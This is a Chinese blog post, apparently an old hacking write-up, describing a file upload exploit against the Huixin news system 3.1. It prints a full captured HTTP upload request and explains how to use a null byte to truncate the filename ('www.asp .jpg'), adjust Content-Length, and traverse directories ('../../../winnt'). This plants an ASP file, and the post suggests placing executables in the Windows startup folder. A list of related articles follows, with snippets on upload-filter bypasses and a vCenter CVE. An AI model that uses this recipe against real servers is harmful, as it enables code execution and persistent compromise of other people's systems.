文件上传漏洞在惠信中的应用

近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧!

惠信新闻系统3.1 windows2000+sp4

先看这句代码。admin_uploadfilesave.asp

...............

Server.mappath(formPath&file.FileName)

............................

保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因为系统有固定的路径 ,改路径的话,上传不会成功)

这是我捕获的数据:

POST /admin_uploadfilesave.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*

Referer: http://127.0.0.1/admin_uploadfile.asp

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7d42cb1f101ae

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Host: 127.0.0.1

Content-Length: 658

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL

-----------------------------7d42cb1f101ae

Content-Disposition: form-data; name="act"

upload

-----------------------------7d42cb1f101ae

Content-Disposition: form-data; name="upcount"

1

-----------------------------7d42cb1f101ae

Content-Disposition: form-data; name="filepath"

newstxt/

-----------------------------7d42cb1f101ae

Content-Disposition: form-data; name="file1"; filename="G:\www.asp .jpg"

Content-Type: text/plain

<% language=vbscript %>

<ihihoiojpojppokkhhkhkhkhk

hkhjkjkjjlkkkkkk>

-----------------------------7d42cb1f101ae

Content-Disposition: form-data; name="Submit"

提交

-----------------------------7d42cb1f101ae--

我将其中filename 处改为www.asp+(空格).jpg,同dvbbs利用一样改content_length的长度,然后用编辑器修改空格十六进制20为00,上传成功!呵呵!

再看路径我们不能改,那能不能利用../../这样的方式回切呢?试试就知道了,捕获数据同上,将name="filepath"

newstxt/ 改为: newstxt/../../../winnt

content-length:658 改为:(658+14)672

好,开始上传,哈哈!在winnt下发现www.asp文件。那我们就可以将路径改为windows的自启动目录,上传exe,vbs,bat...文件。不过以上都要在获得新闻系统的管理者之后,进一步进入。

(0)

相关推荐

  • 文件上传漏洞在惠信中的应用

    近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧! 惠信新闻系统3.1 windows2000+sp4 先看这句代码.admin_uploadfilesave.asp ............... Server.mappath(formPath&file.FileName) ............................ 保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因为系统有固定

  • php安全攻防利用文件上传漏洞与绕过技巧详解

    目录 前言 文件上传漏洞的一些场景 场景一:前端js代码白名单判断.jpg|.png|.gif后缀 场景二:后端PHP代码检查Content-type字段 场景三:代码黑名单判断.asp|.aspx|.php|.jsp后缀 场景四:代码扩大黑名单判断 绕过方式--htaccsess: 绕过方式--大小写绕过: 场景五:一些复合判断 空格.点绕过(windows) ::$DATA绕过(windows) 双写绕过 %00截断 %0a绕过 图片马绕过 二次渲染绕过 条件竞争 /.绕过 前言 文件上传漏

  • 关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题

    背景 CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞.该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可. 影响版本 vmware:esxi:7.0/6.7/6.5 vmware:vcenter_server:7.0/6.7/6.5 漏洞复现 fofa查询 语法:title="+ ID_VC_Welcome +" POC https://x.x.x.x/ui/vropspluginui/rest/ser

  • phpcmsv9.0任意文件上传漏洞解析

    漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,ap

  • 你不知道的文件上传漏洞php代码分析

    漏洞描述 开发中文件上传功能很常见,作为开发者,在完成功能的基础上我们一般也要做好安全防护. 文件处理一般包含两项功能,用户上传和展示文件,如上传头像. 文件上传攻击示例 upload.php <?php $uploaddir = 'uploads/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'],

  • SpringBoot文件上传大小设置方式(yml中配置)

    目录 文件上传大小设置 上传文件大小yml参数配置 解决方法 文件上传大小设置 #文件大小 MB必须大写 #  maxFileSize 是单个文件大小 #  maxRequestSize是设置总上传的数据大小 spring:   servlet:     multipart:       enabled: true       max-file-size: 20MB       max-request-size: 20MB 提示: 必须配置,如果采用默认的配置,稍大的文件就不能上传了. 上传文件

  • ASP的chr(0)文件上传漏洞原理和解决方法介绍

    我们在用ASP开发文件上传功能的时候,为了防止用户上传木马程序,常常会限制一些文件的上传,常用的方法是判断一下上传文件的扩展名是否符合规定,可以用right字符串函数取出上传文件的文件名的后四位,这样很容易就能判断了,但是这里面有一个漏洞,非常危险,就是chr(0)漏洞,详情请接着往下看. 一.首先解释下什么是chr(0)? 在ASP中可以用chr()函数调用ASCII码,其中chr(0)表示调用的是一个结束字符,简单的说当一个字符串中包含chr(0)字符时,只能输出chr(0)前面的字符,ch

  • 网站中的隐形炸弹eWebEditor文件上传漏洞补丁

    打开Upload.ASP文件 找到下面代码: 复制代码 代码如下: <%     sAllowExt = Replace(UCase(sAllowExt), "ASP", "") %> 改为: 复制代码 代码如下: <%     sAllowExt = UCase(sAllowExt)     Do While InStr(sAllowExt, "ASP") Or InStr(sAllowExt, "CER"

  • AJAX和JSP实现的基于WEB的文件上传的进度控制代码第1/2页

    1.引言 2.实现代码 2.1.服务器端代码 2.1.1. 文件上传状态类(FileUploadStatus) 2.1.2. 文件上传状态侦听类(FileUploadListener) 2.1.3. 后台服务类(BackGroundService) 2.1.4. 文件上传状态控制类(BeanControler) 2.2. 客户端代码 2.2.1. AjaxWrapper.js 2.2.2. fileUpload.html 2.2.3. result.jsp 2.2.4. fileUpload.c

  • java文件上传Demo(必看篇)

    说到文件上传我们要做到: 1.引入两个包:commons-fileupload-1.2.1.jar和commons-io-1.3.2.jar 2.将form改为上传文件模式:enctype="multipart/form-data" 3.开始编写相关代码 这里会用到几个关键的类:磁盘文件工厂DiskFileItemFactory : 创建servlet文件上传类:ServletFileUpload 还有几个重要的方法:DiskFileItemFactory类用于将以临时文件形式保存在磁

随机推荐